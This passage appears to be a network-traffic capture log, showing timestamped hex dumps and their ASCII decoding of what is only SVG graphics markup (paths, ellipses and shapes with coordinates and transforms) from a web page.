                                                                                                                                                                              2023-09-15 05:28:20 UTC6739INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                              Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC6755INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                              Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6771INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                              Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6787INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                              Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC6803INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                              Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6819INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                              Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                              2023-09-15 05:28:20 UTC6835INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                              Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                              2023-09-15 05:28:20 UTC6851INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                              Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                              2023-09-15 05:28:20 UTC6867INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                              Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                              2023-09-15 05:28:20 UTC6883INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                              Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                              2023-09-15 05:28:20 UTC6899INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                              Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                              2023-09-15 05:28:20 UTC6915INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                              Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                              2023-09-15 05:28:20 UTC6931INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                              Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6947INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                              Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                              2023-09-15 05:28:20 UTC6963INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                              Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                              2023-09-15 05:28:20 UTC6979INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                              Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                              2023-09-15 05:28:20 UTC6995INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                              Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                              2023-09-15 05:28:20 UTC7011INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
